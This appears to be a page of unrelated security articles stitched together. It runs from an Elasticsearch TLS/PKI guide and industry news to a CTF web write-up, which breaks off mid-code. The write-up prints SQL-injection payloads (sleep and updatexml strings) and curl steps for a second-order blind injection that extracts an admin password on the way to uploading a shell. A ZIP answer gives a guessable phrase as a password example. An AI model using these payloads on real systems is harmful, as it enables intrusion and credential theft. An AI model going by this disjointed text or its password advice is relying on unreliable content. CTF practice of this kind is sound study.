
Elasticsearch Security: Configure TLS/SSL & PKI Authentication


When Elasticsearch security is enabled for a cluster that is running with a production license, the use of TLS/SSL for transport communications is obligatory and must be correctly set up. Additionally, once security has been enabled, all communications to an Elasticsearch cluster must be authenticated, including communications from Kibana and/or application servers.

The simplest way that Kibana and/or application servers can authenticate to an Elasticsearch cluster is by embedding a username and password in their configuration files or source code. However, in many organizations, it is forbidden to store usernames and passwords in such locations. In this case, one alternative is to use Public Key Infrastructure (PKI) (client certificates) for authenticating to an Elasticsearch cluster.

Configuring security along with TLS/SSL and PKI can seem daunting at first, and so this blog gives step-by-step instructions on how to: enable security; configure TLS/SSL; set passwords for built-in users; use PKI for authentication; and finally, how to authenticate Kibana to an Elasticsearch cluster using PKI.

Enabling security

In order to enable security it is necessary to have either a Gold or Platinum subscription, or a trial license enabled via Kibana or the API. For example, the following command would enable a trial license via the API:

curl -X POST "localhost:9200/_xpack/license/start_trial?acknowledge=true"

Where localhost must be replaced with the name of a node in our Elasticsearch cluster.
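To confirm that the license took effect, the license API can be queried (a quick sanity check; again, replace localhost with the name of a node):

curl -X GET "localhost:9200/_xpack/license?pretty"

The response should report the license type as trial and its status as active.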

After enabling a license, security can be enabled. We must modify the elasticsearch.yml file on each node in the cluster with the following line:

xpack.security.enabled: true

For a cluster that is running in production mode with a production license, once security is enabled, transport TLS/SSL must also be enabled. On the other hand, if we are running with a trial license, then transport TLS/SSL is not obligatory.

If we are running with a production license and we attempt to start the cluster with security enabled before we have enabled transport TLS/SSL, we will see the following error message:

Transport SSL must be enabled for setups with production licenses. Please set [xpack.security.transport.ssl.enabled] to [true] or disable security by setting [xpack.security.enabled] to [false]

Configuration of TLS/SSL is covered in the following sections.

TLS/SSL encryption

Elasticsearch has two levels of communications, transport communications and http communications. The transport protocol is used for internal communications between Elasticsearch nodes, and the http protocol is used for communications from clients to the Elasticsearch cluster. Securing these communications will be discussed in the following paragraphs.

Transport TLS/SSL encryption

The transport protocol is used for communication between nodes within an Elasticsearch cluster. Because each node in an Elasticsearch cluster is both a client and a server to other nodes in the cluster, all transport certificates must be both client and server certificates. If TLS/SSL certificates do not have Extended Key Usage defined, then they are already de facto client and server certificates. If transport certificates do have an Extended Key Usage section, which is often the case for CA-signed certificates used in corporate environments, then they must explicitly enable both clientAuth and serverAuth.
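To check whether an existing certificate defines Extended Key Usage, and whether both usages are present, openssl can print the extension (a sketch; transport-cert.pem is a placeholder for a PEM-encoded certificate, and a PKCS#12 bundle would first need converting with openssl pkcs12):

openssl x509 -in transport-cert.pem -noout -text | grep -A1 "Extended Key Usage"

Output listing both "TLS Web Server Authentication" and "TLS Web Client Authentication" means the certificate can play both roles.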

Elasticsearch comes with a utility called elasticsearch-certutil that can be used for generating self-signed certificates that can be used for encrypting internal communications within an Elasticsearch cluster.

The following commands can be used to generate certificates for transport communications, as described in this page on Encrypting Communications in Elasticsearch:

bin/elasticsearch-certutil ca
(press ENTER at both prompts to accept the defaults)

bin/elasticsearch-certutil cert --ca elastic-stack-ca.p12
(press ENTER at all three prompts to accept the defaults)

Once the above commands have been executed, we will have TLS/SSL certificates that can be used for encrypting communications.
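By default these land in the Elasticsearch home directory. A minimal sketch of moving them into place (assuming a standard archive installation, run from Elasticsearch's home directory):

mkdir -p config/certs
cp elastic-certificates.p12 config/certs/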

With the newly created certificates copied into a sub-directory called certs within the config directory, the certificates are then specified in the elasticsearch.yml file as follows:

xpack.security.transport.ssl.enabled: true
xpack.security.transport.ssl.verification_mode: certificate
xpack.security.transport.ssl.keystore.path: certs/elastic-certificates.p12
xpack.security.transport.ssl.truststore.path: certs/elastic-certificates.p12

Now restart all of the nodes in our Elasticsearch cluster for the above changes to take effect.

Define built-in users' passwords

We must now define passwords for the built-in users as described in Setting built-in user passwords . If we are running with a Gold or Platinum license, the previous steps to enable TLS/SSL for the transport communications must be executed before the cluster will start. Additionally, defining the built-in users' passwords should be completed before we enable TLS/SSL for http communications, as the command to set passwords will communicate with the cluster via unsecured http.

Built-in user passwords can be set up with the following command:

bin/elasticsearch-setup-passwords interactive

Be sure to remember the passwords that we have assigned for each of the built-in users. We will make use of the elastic superuser to help configure PKI authentication later in this blog.
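Before enabling TLS/SSL on the http layer, it is worth confirming that the passwords took effect. A minimal check with the elastic superuser (any authenticated endpoint will do; cluster health is a convenient one):

curl -u elastic "localhost:9200/_cluster/health?pretty"

With the correct password, a JSON cluster-health document is returned; without credentials the request is rejected with a 401.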

Http TLS/SSL encryption

For http communications, the Elasticsearch nodes will only act as servers and can therefore use server certificates ― i.e. http TLS/SSL certificates do not need to enable client authentication.

In many cases, certificates for http communications would be signed by a corporate CA. It is worth noting that the certificates used for encrypting http communications can be totally independent from the certificates that are used for transport communications.

To reduce the number of steps in this blog, we’ll use the same certificates for http communications as we have already used for the transport communications. These are specified in the elasticsearch.yml file as follows:

xpack.security.http.ssl.enabled: true
xpack.security.http.ssl.keystore.path: certs/elastic-certificates.p12
xpack.security.http.ssl.truststore.path: certs/elastic-certificates.p12
xpack.security.http.ssl.client_authentication: optional

Enabling PKI authentication

As discussed in Configuring a PKI Realm , the following must be added to the elasticsearch.yml file to allow PKI authentication.

xpack.security.authc.realms.pki1.type: pki

Combined changes to elasticsearch.yml

Once the above steps have been followed, we should have the following security settings in our elasticsearch.yml file.
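As a recap of the snippets above (the certificate paths are the ones used earlier in this post; nothing new is introduced here), the combined settings look like this:

xpack.security.enabled: true
xpack.security.transport.ssl.enabled: true
xpack.security.transport.ssl.verification_mode: certificate
xpack.security.transport.ssl.keystore.path: certs/elastic-certificates.p12
xpack.security.transport.ssl.truststore.path: certs/elastic-certificates.p12
xpack.security.http.ssl.enabled: true
xpack.security.http.ssl.keystore.path: certs/elastic-certificates.p12
xpack.security.http.ssl.truststore.path: certs/elastic-certificates.p12
xpack.security.http.ssl.client_authentication: optional
xpack.security.authc.realms.pki1.type: pki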

Real-Time Incident Response and Forensics Capabilities Debut in Twistlock 2.5


The big names in the container world such as Docker, Google, and Red Hat have all been ratcheting up the security of their container offerings over the last year or two. And that means there's less and less room for independent container security companies who hope to offer best-of-breed solutions. There's a serious danger many of them will be choked off before they can really thrive.

But one company that is still going head to head with the big boys is Twistlock, the San Francisco-based company named after a piece of equipment used to secure shipping containers. Twistlock came out of stealth mode and launched itself onto the container security scene back in 2015.

Since then, the company had raised $30 million by August 15, 2018, when it announced another $33 million in a Series C round of funding. During that period it grew its customer base by over 350% each year, nabbing 25% of Fortune 100 companies as customers.

To stay in the game, Twistlock has released a series of updates to its original product, which lets container users monitor static container images and runtime container applications to identify risks, as well as specify security baselines to ensure a container host has been hardened and containerized applications meet certain quality and security standards.

Twistlock 2.5 Introduces Automated Forensic Data Collection and Correlation

The latest version of its platform, Twistlock 2.5, adds real-time incident response and forensics capabilities to the offering. This provides automated forensic data collection and correlation across cloud native environments of any size, all with no additional resource overhead, according to company claims.

It minimizes network overhead by automatically maintaining a spool of process and network activity on each node in a container environment, collating and correlating this data in the Twistlock Console only if and when an incident is detected.

This approach, says John Morello, Twistlock's chief technology officer, offers greater visibility into the state of applications prior to compromise than traditional forensic solutions afford, without affecting performance.

"As more of our customers scale out their cloud-native environments, they're finding that traditional forensic solutions don't keep up ― they're not built for microservices, and the resource load needed to effectively collect and surface data slows down the production environment.

"With the new forensic capabilities in Twistlock 2.5, we're providing a fully cloud-native approach that captures and stores forensic data pre-attack in a lightweight, decentralized fashion that can scale with even the most complex environment ― yet still surface actionable signals in real time."

An Added Bonus for Amazon Fargate Customers

There's an added bonus here for customers who use Amazon's Fargate container hosting platform. These users can now make use of Twistlock's centralized policy creation and automated enforcement features with Fargate applications without the need for any manual configuration ― unlike existing Fargate security solutions. Twistlock 2.5 allows security teams to automatically enforce security policy in Fargate applications from the same central console used to protect the rest of the cloud native environment.

One further feature worth mentioning in Twistlock 2.5 is the general availability of the runtime defense for serverless functions that the company first unveiled in June. With this release, teams building applications to run in AWS Lambda or other serverless environments can now protect their functions from attack with the same automated policy deployment and centralized console used to protect the rest of their cloud native stack.

Additional New Features in Recent Twistlock Releases

The 2.5 release of Twistlock is just the latest in a series of updates to the Twistlock platform since Version 2.0 was unveiled in April 2017.

Version 2.0 introduced a feature called Runtime Radar 2.0, which helps visualize how containers interact with each other and provides a single view into the status, connectivity, and risk state of an organization's container environment.

It also introduced Compliance Explorer, a feature that relies on predictive analytics to monitor an organization's current compliance state. It creates a dashboard displaying how compliant a company is at any given point in time, listing out those entities that are non-compliant.

Later the company added a Cloud Native App Firewall, or CNAF, and a Vulnerability Explorer, which gives users a stack-ranked view of the most critical risks in their environment, based on the organization's deployments.

Paul Rubens is a technology journalist and contributor to ServerWatch, EnterpriseNetworkingPlanet and EnterpriseMobileToday. He has also covered technology for international newspapers and magazines including The Economist and The Financial Times since 1991.


Blockchain Identity Management | Data Security 2.0?


Blockchain identity management may be the next step in the evolution of data security. Despite their promises, big name brands may not be as safe as we thought they were. Equifax, Yahoo, or Uber? Take your pick. Data breaches have hit all of these companies in recent years, and the relentless pace of hacks doesn’t seem to be letting up.

According to the Breach Level Index, only four percent of breaches since 2013 were rendered useless due to encryption. This is a pretty remarkable statistic when you consider that cryptography has been around for more than 50 years. The public is becoming noticeably worried, but what can these big names do about this trend? And will blockchain identity management help?

Cryptography Baked In

Bitcoin has been providing a real-world case in secure data communications since 2009. Add to that the fact that its technology is open-source, and you really have to wonder why big companies aren’t implementing their own crypto security solutions. As far as we know, no one has ever hacked the Bitcoin blockchain. Anybody who hasn’t yet should probably be taking a long hard look at what blockchain can offer them.

In simple terms, Bitcoin uses public/private key cryptography , which allows sensitive information to be passed securely over a network. The beauty of Bitcoin is that the security is part of the network from the get-go. Contrast this with many companies who are attempting to bolt on security to their already aging networks.
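As a rough illustration of the primitive Bitcoin builds on, here is a sketch using the openssl CLI with secp256k1, the curve Bitcoin uses (the file names and message are arbitrary):

# generate a private key and derive the matching public key
openssl ecparam -genkey -name secp256k1 -noout -out priv.pem
openssl ec -in priv.pem -pubout -out pub.pem
# sign a message with the private key
echo -n "pay alice 1 BTC" | openssl dgst -sha256 -sign priv.pem -out msg.sig
# anyone holding only the public key can verify the signature
echo -n "pay alice 1 BTC" | openssl dgst -sha256 -verify pub.pem -signature msg.sig

Only the holder of the private key can produce a valid signature, while anyone can verify it; that asymmetry is what lets sensitive claims travel safely over an open network.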

A number of other cryptocurrency projects and blockchain startups are extending these core principles to allow users to effectively manage their identity on the blockchain. Major problems require major solutions. Those that provide the best blockchain identity management solution will most likely have huge revenues as this industry matures.

Where Current Systems Fail

Centralization

Corporations like IBM have already identified this potential and are racing to be the leader in permissioned blockchain solutions. Some have argued, however, that private blockchains aren’t really viable . Regardless of where you stand, it’s helpful to figure out how we got here.

The first major flaw that current identity management systems suffer from is centralization . The internet was originally designed as a peer-to-peer network. For the first time in history, this network allowed for the free flow of information without censorship and across borders. Those who owned the medium no longer controlled the message.



Identity management will ideally follow the peer-to-peer internet model.

Unfortunately, private entities have since captured much of the internet: Google with internet search, Facebook with social media, ICANN with domain name registries, Amazon in e-commerce and so on. You get the picture. These (and many other) companies stockpile massive amounts of personal data, making them attractive targets. This stockpiling creates the so-called honeypot effect: hackers are far more likely to break into these systems than to target individual users.

Censorship

The second issue this creates is the increased possibility of abuse of power. Major tech giants already have a reputation for censoring content based on political and ideological views. This poses a real threat to freedom of speech and authentic self-expression, which many describe as the hallmarks of prosperous societies.

Keep in mind that many online applications require you to register with one of these companies either via their email or social profile. If they ever delete your accounts or censor them, for whatever reason, where does that leave you? A virtual nomad who doesn’t exist.

Blockchain Identity Management

The creators of the internet failed to see the need for good identity management when they were building out the very first protocols. They couldn’t have known that at the time, of course. Unfortunately, the result is the huge-scale privatization of our data. Tech companies have capitalized on the opportunity to own as much of our data as they can get their hands on. As they say, if it’s free, chances are you are the product! These companies have many excellent free products. They have to pay for them somehow.

That’s the fundamental change that blockchain is bringing to identity management. Centrally hosted data servers (including cloud-based solutions) are costly to maintain, and many will be eliminated when users can manage their own identity with blockchain technology. There are a number of projects looking to be the leader in this area. The competition is tough, and predicting the best approach is a difficult challenge.

Some projects like Civic promote blockchain identity management via their app. Others like Blockstack provide a browser-based solution to interact with decentralized applications. Another interesting feature they are developing is a peer-to-peer domain name service (DNS) built directly on the blockchain. You are no longer at the mercy of a single organization, like ICANN, when hosting your favorite or controversial content.

Final Thoughts

It’s tough to figure out which approach will be best. There are many factors to consider when building out the future of identity management: language, culture, access to technology, and so on. Viewing it from a global perspective will help. We aren’t yet at a point where everyone in the world has access to their own smartphone. The success of the internet today is largely thanks to simple technologies like the HTTP and TCP protocols, which abstract a lot of the technical details away from us so we can just get on with the business of “internetting.”

Connecting emerging blockchain protocols to existing internet protocols seems like the logical choice. There are companies riding the blockchain bandwagon who plan to be the next generation of power centers. The chances are high that they will fail. In the not-too-distant future, we will become aware of all the choices being built for us today. Consumers are waking up to the fact that data hosted elsewhere is not particularly safe. Finally, we will be able to take control of our own online identity.


Are there any known standards or security flaws in password-protected ZIP files ...


Just like the title says. I was hoping someone could direct me to documents/resources that show how to encrypt a zip file such that most (if not all) 3rd-party apps can open it.

I'm more interested in the security aspect rather than how to do it - any knowledge is welcome.

This is to casually protect files on my work computer (and network drive) from prying co-workers.

There aren't any big flaws in a ZIP password itself, but the encryption scheme matters. The legacy ZipCrypto scheme the format originally shipped with is vulnerable to a known-plaintext attack and shouldn't be considered strong protection; modern tools such as 7-Zip and WinZip can instead encrypt ZIP entries with AES-256, which has no known practical attacks. Against AES, cracking tools have to fall back to brute force, usually starting with a dictionary attack. For protecting files locally or on a network, that should be fine as long as you pick a long enough password. I'd suggest using a phrase like 'givemelibertyorgivemedeath' or whatever. Long enough to make brute-force attacks infeasible but short enough to keep from being a pain to type every time you need to unlock a file.
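If you go this route, prefer AES-256 over the legacy scheme where your tools allow it. A sketch with common command-line tools (archive and file names are placeholders):

# AES-256 encrypted zip via 7-Zip; prompts for the passphrase
7z a -tzip -mem=AES256 -p secret.zip report.xlsx
# Info-ZIP's zip -e uses the weaker legacy ZipCrypto scheme (maximally compatible)
zip -e secret-legacy.zip report.xlsx

Note that either way, ZIP encryption protects file contents but not file names, which remain visible in the archive listing.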

Escrow launches in Australia


Global secure payments system Escrow.com has launched in Australia with the introduction of Australian Dollar capability for online escrow payments.

Escrow.com says its platform can be used for secure transactions involving any item of value, including domain names, vehicles, machinery, aircraft, space station hotel deposits “or anything that a business or an individual might want to buy or sell safely online”.

According to Escrow.com, it has safely processed over US$3.5 billion in transactions with its secure service, and acts as a trusted third party that collects, holds and only disburses funds when both a buyer and a seller are satisfied with a transaction.

The company pitches its service as ideal for transaction sizes from $100 to $10,000,000 or more.

“Now, for the first time, merchants and online marketplaces in Australia have the ability to tap into the security and power of Escrow.com, ensuring safe transactions for buyers and no chargebacks, ever, for sellers,” the company says in its announcement of entry into the Australian market.

“Escrow.com has already made a name for itself in other markets, delivering unprecedented safety and security for online transactions, thanks to the escrow process, which sees funds kept in trust until all involved parties are satisfied with the deal,” said Escrow.com General Manager Jackson Elsegood.

“With the launch of Australian Dollar capability, buyers and sellers in Australia can now make the most of what this escrow process has to offer.”

Escrow.com’s Australian dollar launch comes just weeks after the launch of Escrow Offer, promoted as the “easiest way to introduce the power of price negotiation into online platforms”. This followed the release of Escrow Pay, which lets businesses integrate the protection provided by the Escrow.com API directly into their websites, mobile apps and online marketplaces.


Google+ to shut down early after second major security incident


After another data leak, its second such leak in a year, Google today announced it was shutting down its beleaguered social media platform, Google+. API access will shut down even sooner, within the next 90 days.

The newest vulnerability affected 52.5 million users, according to Google. Profile information including names, email addresses, age, and occupation was exposed. Worse, accounts set to private were still affected. Apps may also have been able to access profile data shared privately with specific Google+ users, rather than publicly.


“With the discovery of this new bug, we have decided to expedite the shut-down of all Google+ APIs; this will occur within the next 90 days,” says David Thacker, VP of product management at Google, in a blog post . “In addition, we have also decided to accelerate the sunsetting of consumer Google+ from August 2019 to April 2019.”

Thacker says Google discovered the bug as part of its standard testing procedure, stating that there is “no evidence” that developers who had access to this data were aware of it, or had misused it.

Google has already begun notifying users affected by the bug.

In October, a similar Google+ vulnerability may have exposed data to app developers for as long as three years. The bug was discovered in March, but not publicly disclosed until October.

This leak, Thacker says, was discovered by Google itself and was live for just six days.

Expediting changes to Google+ on Google Blog

News Flash | "Godfather of Hackers" Turns Out to Be an Unemployed Man, Criminally Detained on Suspicion of Illegal Use of Information Networks


"Turned down a 100-million-yuan offer from Jack Ma." "China's youngest godfather of hackers." These resounding titles were attached to Guo, an unemployed young man. By fabricating an identity for himself online and recording hacking videos, he attracted followers and profited from their membership payments. Yesterday, Beijing Morning Post reporters learned exclusively from the Beijing Municipal Public Security Bureau's Network Security Corps (hereafter "the Corps") that, as part of the Ministry of Public Security's "Clean Net 2018" campaign, police took down the hacker website "Eastern Alliance" (东方联盟) and arrested Guo, the self-promoting "godfather of hackers". Guo is currently in criminal detention at the Haidian branch on suspicion of illegal use of information networks.


The "godfather of hackers" sold hacking tutorials and software online

In October this year, the Corps, together with the network security unit of the Haidian branch, found during online patrols numerous posts loudly hyping the "godfather of hackers" Guo. The posts were highly inflammatory and misleading, and hugely influential in internet hacker circles. They painted Guo as a leader of "Chinese hackers" and claimed he had "turned down a 100-million-yuan offer from Jack Ma". "Guo was once recognized as one of the most gifted hacker godfathers in the world; at 16 he founded Huameng (now Eastern Alliance). A regular presence at hacker and software conferences, he now runs his own internet company, serves as a senior security advisor to several firms, and founded the largest hacker security alliance in China." The posts further claimed that "Guo created the famous hacker group 'Eastern Alliance', quickly expanded its core membership to more than a dozen people, and in 2007 announced the founding of Huameng, which became one of the largest hacker organizations in China at the time."

Police found that besides hyping Guo himself, the posts repeatedly mentioned the hacker website "Eastern Alliance" that he ran. Investigators quickly established that "Eastern Alliance" was indeed a hacker site which, for a membership fee, widely distributed hacking tools and shared hacking techniques, including videos recorded by Guo teaching criminal hacking methods in a "one-on-one tutoring" format.

Beijing police arrest the fake godfather across provinces

Through further checks, police found that the actual operator of "Eastern Alliance" was Guo (male, 28, from Zhaoqing, Guangdong), living in Foshan, Guangdong. He alone posted the self-promoting threads, manufacturing the illusion of a "godfather of hackers". By building hype he attracted followers and profited from selling memberships and software. The other "members" were all invented by Guo. The investigation also found that the stories of Jack Ma's 100-million-yuan offer, the senior security advisor roles at multiple companies, and the vast hacker organization founded at 16 were all fabricated.

Once the facts of the case were largely clear, police quickly located the suspect. Before the arrest, officers traveled from Beijing to Guangdong, both to secure evidence and to plan the operation. At 2 pm on November 1, Guo, operator of the hacker site "Eastern Alliance", was arrested in Chancheng district, Foshan, Guangdong. Confronted by police, he confessed to running the hacker website, distributing hacking tools and teaching hacking. Officers learned that after graduating from technical secondary school, Guo had no steady job and lived off odd jobs. Through self-promotion he attracted followers and recruited members.

Guo confessed that he set up the website in 2015. After a user paid 899 yuan for a lifetime membership or 750 yuan for a one-year membership, Guo added them to WeChat and QQ groups for discussion. He also published hacking tools on the site, usually in the "video tutorials" section, downloadable by members only. His WeChat group currently has nearly 300 members and his QQ group over 400.

Guo is currently in criminal detention at the Haidian branch on suspicion of illegal use of information networks.

*This article is from Beijing Morning Post (北京晨报). Please credit the original source when republishing.

Google Cloud Platform now IRAP-certified by Australian Cyber Security Center


As more organizations in Australia seek to take advantage of cloud computing, Google Cloud has continued to expand our capabilities in the region. We opened our Sydney region in July 2017, and continue to expand our list of available services there. For current and potential cloud adopters, particularly those in the public sector and other regulated industries, security and compliance remain a top priority.

To meet the security needs of customers in the region, we’re happy to announce that Google Cloud Platform (GCP) has achieved Information Security Registered Assessors Program (IRAP) certification for a subset of services by the Australian Cyber Security Center, a part of the Australian Signals Directorate (ASD). Attaining IRAP certification confirms that GCP’s physical, personnel and information security controls meet the requirements prescribed by the ASD.

As a part of this certification, Google Cloud Platform has been added to the ASD’s Certified Cloud Services List (CCSL). Inclusion on the list opens the door for Australian federal, state, and local government agencies to store data and run workloads on GCP. IRAP certification also provides a path for GCP customers to work with the Australian government, and provides validation for private sector organizations that their data will be protected and handled in accordance with the Australian Cyber Security Center’s rigorous standards.

For more information on our IRAP certification, other certifications Google Cloud has achieved, and the global regulations we help customers address, visit the Google Cloud compliance site .


Web Writeup: 2nd Hunan College Students' Cybersecurity Skills Competition


Web Writeup: 2nd Hunan College Students' Cybersecurity Skills Competition

0x1 Preface

I had the luck to scrape by at the 2nd Hunan College Students' Cybersecurity Skills Competition. Apart from the tiring bus ride to Xiangtan University, the treatment during the competition was excellent (ps. many thanks to the lovely volunteers from XTU who worked hard on site), and I'm grateful to the organizers for a carefully prepared event.

Back to the competition itself: this web dog really blew it this time, and in the end nobody solved either of the two web challenges. Below I share my thinking during the contest, plus notes from reproducing the challenges afterwards.

0x2 Web 200

(1) Solving process

First, walk through the challenge flow:

upload CSV => next step => save CSV contents to the database => the INSERT produces an injection point

The CSV format is very simple:



In the HTTP request, the data mainly works like this: double quotes take top priority in delimiting a field, and then commas separate the columns.

At the time, from the format the CSV was saved in, (4,'["123","123","123","123"]','2018-12-08 12:37:24'),

I guessed this was a second-order INSERT injection. There is a filter here:

' => \' which lets a single quote escape. Enter the following in the first field of the second row:

123\' or sleep(5),123)# => (4,'["123\',123)#","123","123","123"]','2018-12-08 12:37:24') which thus becomes (4,'["123\' or sleep(5),123) so in theory the payload has escaped the quoting.

But when I tested locally during the contest, it kept throwing

ERROR 1292 (22007): Truncated incorrect INTEGER value:

I injected the payload the same way and saw no delay after saving, so I started doubting my own idea.

And since nobody had solved this challenge yet, I figured someone as weak as me probably couldn't do it either, and gave up... emm (full mental breakdown).

In the final hour the organizers gave a hint: second-order injection.

But by then I was already stuck too deep in web500 to pull myself out.

(2) Post-contest analysis

First, the reason my INSERT tests kept failing locally:

select @@version;

+-----------+
| @@version |
+-----------+
| 5.7.21 |
+-----------+
1 row in set (0.00 sec)

show variables like "sql_mode";

STRICT_TRANS_TABLES // strict mode

MySQL 5.7.17 enables strict mode by default.

For background on strict mode, see the article MySQL sql_mode 说明(及处理一起 sql_mode 引发的问题)

What it does:

STRICT_TRANS_TABLES

Setting it enables strict mode.

Note that STRICT_TRANS_TABLES is not a combination of several policies; it specifically governs how INSERT and UPDATE handle missing or invalid values:

1. As mentioned above, passing '' into an int column is illegal under strict mode; with strict mode off it becomes 0 and produces a warning

2. Out-of-range values are clamped to the boundary value on insert

3. A value is missing when a new row to be inserted does not contain a value for a non-NULL column

My testing turned up a few small quirks.

Testing on 5.6.35, a version below MySQL 5.7.17, I found that:

insert into user(`user`,`pass`) values('123"'^(sleep(5)),'123')

this INSERT succeeds; the special symbol is ignored and only a warning is raised.

Under strict mode on higher versions, the same special symbol raises an error instead, so the expression cannot be evaluated and time-based blind injection stops working.

But interestingly:

mysql> insert into test(`name`,`password`) values('"' or updatexml(1,concat(0x7e,(select user())),0),'123');
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost'

If an error-based vector exists, error-based injection still works under strict mode; this tip is worth remembering.

A while ago I read an article by P神 about concatenation operators causing INSERTs to fail, which suggested using comparison operators to work around the problem; I think there are still some issues there,

and it needs more in-depth research.

Finally, since I never tested the MySQL version used by the challenge, I don't know what the actual situation was; my whole approach may have been wrong from the start,

or the injection point may have been somewhere else. If you solved it, I'd welcome a chat.

0x3 Web 500

This is the challenge I spent the longest time on during the contest and still failed to solve, which I really regret. It also made me reflect on a lot of my own problems: my contest experience is sorely lacking, I dragged things out and got stuck everywhere, and in the end I held my teammates back; we missed first place by 15 points.

(1) Solving process

Looking at the challenge page source, a comment gave a hint:

<!--www.zip -->

The download contains two files: index.php and valicode.php

index.php is the main challenge file

valicode.php generates the CAPTCHA

Since the code is fairly long, I'll only analyze the vulnerable parts here.

The full source is in my github repo: ctf_web解题记录

Walking through the code flow:

Program features (lines 1-68):

function register($user, $pass)
function login($user, $pass)
function listnote($user)
function getnote($id, $user)
function savenote($id, $user, $title, $content)
function newnote($user, $title, $content)
function delnote($id, $user)

Solution flow:

Reading the code reveals a backup feature that can be used to upload a shell, but it requires admin privileges, so the admin account has to be obtained through SQL injection.

The intended path is:

SQL injection -> obtain the admin password -> upload a shell via backup -> get the flag

Vulnerability 1: blind SQL injection

function register($user, $pass) {
global $conn;
$user = '0x' . bin2hex($user);
$pass = '0x' . bin2hex($pass);
$result = $conn->query("select * from user where user=$user");
$data = $result->fetch_assoc();
if ($data) return false;
return $conn->query("insert into user (user,pass) values ($user,$pass)");
}
function login($user, $pass) {
global $conn;
$user = '0x' . bin2hex($user);
$result = $conn->query("select * from user where user=$user");
$data = $result->fetch_assoc();
if (!$data) return false;
if ($data['pass'] === $pass) return true;
return false;
}

The first few lines show that every variable entering the SQL statement is hex-encoded,

so apart from a second-order injection there is no way to inject.

Combined with the challenge description, "many vulnerabilities are caused by carelessness",

I patiently read through the code of every feature, and finally found that in

function delnote($id, $user) {
global $conn;
$id = (int)$id;
$result = $conn->query("delete from note where id=$id and user='$user'");
return $result;
}

$user is concatenated into the SQL statement without hex encoding. So let's trace back how the parameter is passed:

case 'delete':
if (!$user) {
header("HTTP/1.1 302 Found");
header("Location: ?action=login");
}
$id = (int)$_GET['id'];
var_dump($id);
delnote($id, $user); // calls delnote
header("HTTP/1.1 302 Found");
header("Location: ?action=home");

Tracing further back:

//69-73
$user = $_SESSION['user'];
$action = $_GET['action'];
$admin = $user === 'admin';
// $conn = mysqli_connect(DB_HOST,DB_USER,DB_PASS,DB_DATABASE) or die("connect to mysql error!");
$conn->query("set names 'utf8'"); $user 是由 $_SESSION['user'] 决定的 继续寻找下 $_SESSION['user'] 赋值 switch ($action) {
case 'login':
if ($user) {
header("HTTP/1.1 302 Found");
header("Location: ?action=home");
}
elseif (isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['code'])) {
if ($_POST['code'] != $_SESSION['answer']) echo '<div class="alert alert-danger">Math Test Failed</div>';
elseif ($_POST['user'] == '') echo '<div class="alert alert-danger">Username Required</div>';
elseif ($_POST['pass'] == '') echo '<div class="alert alert-danger">Password Required</div>';
elseif (!login((string)$_POST['user'], (string)$_POST['pass'])) echo '<div class="alert alert-danger">Incorrect</div>';
else {
$_SESSION['user'] = $_POST['user']; //here
header("HTTP/1.1 302 Found");
header("Location: ?action=home");
}
$_SESSION['answer'] = rand();
}
?>

Looking at $_SESSION['user'] = $_POST['user']; we can see that after a successful login, the POSTed user value is assigned directly to the session.

So here's the idea:

Register a user whose username contains an injection payload, then trigger the delnote function; although it only produces an error, the admin password can be extracted through time-based blind injection.
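A rough sketch of that flow with curl (the host, the CAPTCHA handling, and the exact payload are hypothetical; the point is that the username itself is the injection vector):

# 1. register a user whose name closes the quote in: delete from note where id=$id and user='$user'
curl -c jar.txt --data-urlencode "user=x' or if(substr((select pass from user where user=0x61646d696e),1,1)='a',sleep(5),0)#" -d "pass=123&code=<answer>" "http://target/?action=register"
# 2. log in as that user (which puts the payload into $_SESSION['user']), then trigger delnote
curl -b jar.txt --data-urlencode "user=x' or if(substr((select pass from user where user=0x61646d696e),1,1)='a',sleep(5),0)#" -d "pass=123&code=<answer>" "http://target/?action=login"
curl -b jar.txt "http://target/?action=delete&id=1"
# 3. a roughly 5-second response means the guessed character is right; iterate position by position
# (the OR branch is evaluated per row of the note table, so it assumes the table is non-empty)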

But there are a few issues to note when analyzing the flow:

Does registration restrict the input?

case 'register':
if ($user) {
header("HTTP/1.1 302 Found");
header("Location: ?action=home");
}
elseif (isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['code'])) {
if ($_POST['code'] != $_SESSION['answer']) echo '<div class="alert alert-danger">Math Test Failed</div>';
elseif ($_POST['user'] == '') echo '<div class="alert alert-danger">Username Required</div>';
elseif ($_POST['pass'] == '') echo '<div class="alert alert-danger">Password Required</div>';
elseif (!register((string)$_POST['user'], (string)$_POST['pass'])) echo '<div class="alert alert-danger">User Already Exists</div>';
else echo '<div class="alert alert-success">OK</div>';
$_SESSION['answer'] = rand();
} $_

Most UK retailers plan to up cyber security


Retailers plan to increase cyber security measures during the holiday season, according to a poll of IT professionals in the sector in the UK, Germany, Belgium, the Netherlands, Luxembourg and the US.

Some 63% of UK and 62% of German retailers claimed to increase cyber security measures during the holiday season, according to the survey, commissioned by IT automation and security firm Infoblox.

The main reason cited for the increase by one-third of respondents in these countries was a seasonal rise in social engineering attacks, which were also identified as a dominant concern for 25% of IT professionals in the Netherlands’ retail sector.

Other kinds of attack cited were social media scams, distributed denial of service (DDoS) and ransomware .

Social media scams were of most concern in the US (19%), followed by the UK (15%), the Netherlands (14%) and Germany (12%).

DDoS attacks were of greatest concern in the Netherlands (20%), followed by Germany (17%), the UK (12%) and the US (7%).

Ransomware was of greatest concern in the US (12%), followed by Germany (11%), the UK (10%) and the Netherlands (9%).

The research found that among the main threats posed to networks within the UK were unpatched security vulnerabilities (28%), online consumers themselves (25%) and internet-connected devices (21%).

Within the UK, artificial intelligence (43%) was cited as the technology most likely to be implemented within the next year, followed by internet-connected devices (35%), portable media technology (24%), omni-channel technology (23%) and augmented reality (17%).

The majority of IT decision-makers in the UK (55%) said they were concerned about new technologies, in stark contrast to those in the Netherlands, where only 20% claimed to be concerned.

The survey also polled consumers on their experiences and attitudes towards online data privacy and security while shopping online.

Although most global consumers shop online to some degree, 17% do nothing to protect their data while doing so. The UK is the most complacent, with one in five taking no proactive action to protect their data. German consumers are more cautious when shopping online, with more than half (53%) shopping only on secured Wi-Fi networks.

“The level of online shopping activity always increases significantly during the holiday season, and can provide rich pickings for the opportunistic cyber criminal, so it’s no coincidence that more than half of retailers will increase their cyber security spending during their most prosperous and dangerous time of year,” said Gary Cox, technology director, western Europe at Infoblox.

“It is critical that enterprises take measures to get additional network visibility, so they can respond quickly to potential cyber incidents which could result in lost revenue and brand damage.”

